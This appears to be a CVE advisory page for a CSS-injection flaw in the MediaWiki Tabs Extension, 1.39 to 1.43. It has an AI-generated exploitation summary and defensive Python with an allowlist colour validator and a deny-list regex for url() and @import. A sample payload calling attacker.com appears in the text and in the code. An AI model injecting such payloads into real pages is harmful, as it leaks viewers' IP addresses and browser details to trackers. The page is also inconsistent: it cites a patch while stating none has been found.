CVE-2025-32075
Description
Improper Input Validation vulnerability in The Wikimedia Foundation Mediawiki - Tabs Extension allows Code Injection. This issue affects Mediawiki - Tabs Extension: from 1.39 through 1.43.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Improper input validation in MediaWiki Tabs Extension allows CSS injection and data exfiltration via unsanitized container attributes.
Vulnerability
Overview
The MediaWiki Tabs Extension (versions 1.39 through 1.43) contains an improper input validation vulnerability in its handling of CSS values within system messages and tab container attributes. The extension fails to sanitize user-supplied CSS, allowing injection of arbitrary CSS properties that can trigger external HTTP requests [1].
Exploitation
An attacker with the ability to edit system messages (such as tabs-dropdown-bgcolor) or to create pages containing the extension's tab tags can inject CSS that sets background URLs to attacker-controlled servers. For example, setting a container attribute like `background: url(https://attacker.com/leak)` causes the browser to fetch that URL when the page is rendered, leaking the viewer's IP address and user agent string [1].
Impact
Successful exploitation allows an attacker to collect IP addresses and user agent strings of any user who views a page containing the malicious tabs. This information can be used for tracking, profiling, or further targeted attacks. The vulnerability is classified as a code injection because the injected CSS is executed in the context of the MediaWiki page [1].
Mitigation
The issue has been addressed in the extension's repository (see patch in Gerrit). Users should update to a patched version of the Tabs Extension. As of the publication date, no workaround is documented, and the vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog [1].
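The core defect described above is a configured CSS value (a system message or a tab container attribute) being copied into a style attribute without validation. The following is an added example, not code from the Tabs Extension or from MediaWiki, that contrasts that vulnerable pattern with an allowlist check: a background colour setting is accepted only if it parses as a hex, named or rgb()/rgba() colour, and anything else falls back to a default instead of reaching the page. The element markup, the `tabs-dropdown` class name and the sample inputs are constructed for illustration; only the `tabs-dropdown-bgcolor` message name and the attacker.com URL come from the advisory text. A small audit helper is included for flagging existing wiki messages whose values could trigger a remote fetch.

```python
import html
import re

# Constructed sample inputs (not from the advisory): a legitimate colour value and a
# value that smuggles a url() declaration past a naive "it's just a colour" assumption.
SAFE_INPUT = "#336699"
LEAK_INPUT = "red; background: url(https://attacker.com/leak)"

# Allowlist for a background-colour setting: hex colours, named colours, and
# rgb()/rgba() with purely numeric arguments. The anchors matter: the whole value
# must be a colour, so a trailing "; background: url(...)" can never match.
_HEX = r"#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})"
_NAMED = r"[a-zA-Z]{1,20}"
_RGB = r"rgba?\(\s*\d{1,3}(?:\s*,\s*\d{1,3}){2}(?:\s*,\s*(?:0|1|0?\.\d+))?\s*\)"
COLOR_RE = re.compile(rf"^\s*(?:{_HEX}|{_NAMED}|{_RGB})\s*$")

# CSS constructs that cause the viewer's browser to contact a remote host or that
# historically allowed script execution; useful when auditing existing messages.
_FETCH_RE = re.compile(r"url\s*\(|@import|image-set\s*\(|expression\s*\(|\\[0-9a-fA-F]", re.I)


def is_safe_color(value: str) -> bool:
    """True only if the whole value is a plain colour with no extra declarations."""
    return bool(COLOR_RE.match(value))


def flags_remote_fetch(value: str) -> bool:
    """Audit check: does this configured CSS value contain a fetch-triggering construct?"""
    return bool(_FETCH_RE.search(value))


def render_tab_container_unsafe(bgcolor: str) -> str:
    # Vulnerable pattern: the configured value is interpolated into the style attribute as-is,
    # so an injected url() is shipped to every viewer of the page.
    return f'<div class="tabs-dropdown" style="background-color: {bgcolor}">...</div>'


def render_tab_container_safe(bgcolor: str, default: str = "#ffffff") -> str:
    # Hardened pattern: validate against the allowlist and fall back to a known-good default.
    # Rejecting is safer than "cleaning": there is no need to guess what a partial value means.
    color = bgcolor if is_safe_color(bgcolor) else default
    return f'<div class="tabs-dropdown" style="background-color: {html.escape(color, quote=True)}">...</div>'


if __name__ == "__main__":
    for value in (SAFE_INPUT, LEAK_INPUT):
        print("input:", value)
        print("  fetch construct present:", flags_remote_fetch(value))
        print("  unsafe render:", render_tab_container_unsafe(value))
        print("  safe render:  ", render_tab_container_safe(value))
```

The allowlist approach generalises beyond colours: for any system message that ends up in a style attribute, decide what grammar the value is supposed to have and accept only that, rather than trying to enumerate dangerous substrings. The `flags_remote_fetch` check is the weaker, deny-list form and is meant for one-off review of already-configured messages on an unpatched wiki, not as the sanitiser.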
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.